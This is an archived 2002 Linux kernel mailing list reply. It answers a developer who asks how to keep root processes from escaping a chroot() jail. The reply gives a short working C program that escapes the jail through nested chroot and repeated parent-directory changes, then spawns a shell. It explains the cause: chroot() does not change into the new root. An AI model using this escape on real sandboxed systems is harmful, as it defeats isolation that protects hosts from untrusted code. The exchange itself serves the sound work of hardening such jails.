Return-Path: Received: (majordomo@vger.kernel.org) by vger.kernel.org via listexpand id ; Fri, 5 Jul 2002 10:00:32 -0400 Received: (majordomo@vger.kernel.org) by vger.kernel.org id ; Fri, 5 Jul 2002 10:00:31 -0400 Received: from ncc1701.cistron.net ([62.216.30.38]:24841 "EHLO ncc1701.cistron.net") by vger.kernel.org with ESMTP id ; Fri, 5 Jul 2002 10:00:30 -0400 From: "Miquel van Smoorenburg" Subject: Re: prevent breaking a chroot() jail? Date: Fri, 5 Jul 2002 14:02:58 +0000 (UTC) Organization: Cistron Message-ID: References: <1025877004.11004.59.camel@zaphod> Content-Type: text/plain; charset=iso-8859-15 X-Trace: ncc1701.cistron.net 1025877778 15717 62.216.29.67 (5 Jul 2002 14:02:58 GMT) X-Complaints-To: abuse@cistron.nl X-Newsreader: trn 4.0-test76 (Apr 2, 2001) Originator: miquels@cistron-office.nl (Miquel van Smoorenburg) To: linux-kernel@vger.kernel.org Sender: linux-kernel-owner@vger.kernel.org X-Mailing-List: linux-kernel@vger.kernel.org Content-Length: 1207 Lines: 26 In article <1025877004.11004.59.camel@zaphod>, Shaya Potter wrote: >I'm trying to develop a way to ensure that one can't break out of a >chroot() jail, even as root. I'm willing to change the way the syscalls >work (most likely only for a subset of processes, i.e. processes that >are run in the jail end up getting a marker which is passed down to all >their children that causes the syscalls to behave differently). >What should I be aware of? I figure devices (no need to run mknod in >this jail) and chroot (as per man page), is there any other way of >breaking the chroot jail (at a syscall level or otherwise)? int main() { chdir("/"); mkdir("foo"); chroot("foo"); chdir("../../../../../../.."); chroot("."); execl("/bin/sh", "sh", NULL); } Run as root and you're out of the chroot jail. This is because chroot() doesn't chdir() to the new root, so after a chroot() in the chroot jail you're suddenly out of it. Mike. - To unsubscribe from this list: send the line "unsubscribe linux-kernel" in the body of a message to majordomo@vger.kernel.org More majordomo info at http://vger.kernel.org/majordomo-info.html Please read the FAQ at http://www.tux.org/lkml/